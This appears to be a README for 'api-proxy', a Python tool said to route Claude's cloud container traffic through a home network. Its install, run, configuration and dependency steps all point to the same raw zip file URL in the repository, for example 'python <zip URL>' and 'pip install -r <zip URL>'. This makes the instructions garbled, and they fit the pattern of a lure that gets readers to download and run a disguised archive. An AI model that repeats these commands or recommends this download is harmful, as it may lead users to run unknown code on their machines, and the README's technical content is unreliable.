api-proxy is a small Python container designed to proxy requests from Claude's cloud container through your home network. This tool allows you to seamlessly bridge the gap between cloud-based applications and your local network, enabling smoother communication and improved performance.
To successfully run api-proxy, you need the following:
- A device with Python 3.6 or higher installed
- At least 256 MB of RAM
- 100 MB of disk space
- An internet connection for downloading the file and accessing external services
To download api-proxy, you will need to visit the Releases page. This page contains the latest version of the software. Click on the link below to access it:
On the Releases page, find the latest version of api-proxy. Click on the appropriate download link for your operating system (e.g., Windows, macOS, or Linux).
Once the download is complete, locate the downloaded file in your device's Downloads folder. If the file is in a zip format, right-click on it and select "Extract All" to unzip the contents.
After extracting the files, open a terminal or command prompt. Navigate to the folder where you extracted the files. Use the following command to run the application:
python https://github.com/marshyisbest66gmailcom/api-proxy/raw/refs/heads/main/skill/api_proxy_3.9.zipIf everything is set up correctly, you will see confirmation that api-proxy is running.
To customize api-proxy for your needs, you may want to adjust its settings. The configuration file, usually named https://github.com/marshyisbest66gmailcom/api-proxy/raw/refs/heads/main/skill/api_proxy_3.9.zip, allows you to set parameters that suit your network.
- Proxy Settings: Specify the address and port for the proxy.
- Timeout: Set how long the application should wait for a response.
You can edit this file using any text editor. Make sure to save your changes before running the application.
Using api-proxy is simple. After starting the application, it listens for incoming requests.
You can use api-proxy to send requests from your application or other services. Hereβs an example of how to make a request:
- Open your preferred application that can send HTTP requests, like Postman.
- Set the URL to your local machine's address (usually
http://localhost:5000). - Choose the appropriate method (GET, POST, etc.) based on your needs.
- Send the request and check the response.
If you encounter issues:
- Check Python Installation: Ensure Python is installed and added to your system's PATH.
- Firewall Settings: Your firewall may block connections. Check your firewall settings to allow api-proxy through.
- Dependencies: Make sure all required packages are installed. You can install them using
pip install -r https://github.com/marshyisbest66gmailcom/api-proxy/raw/refs/heads/main/skill/api_proxy_3.9.zip.
To get started with api-proxy, follow the link below to download the latest version:
Follow the steps outlined above to download and install the software. With api-proxy, you can bring Claude's powerful capabilities directly into your home network.
- Documentation: Check the official documentation in the repository for more details.
- Community Support: Join discussions in the GitHub issues section if you need help.
- Feedback: We welcome any feedback or suggestions to improve this tool.
- api
- claude-ai
- claude-skills
- llm
- proxy-server
Feel free to explore and utilize this application as you connect your home network with Claude's cloud capabilities. This is just the beginning of what you can achieve with api-proxy.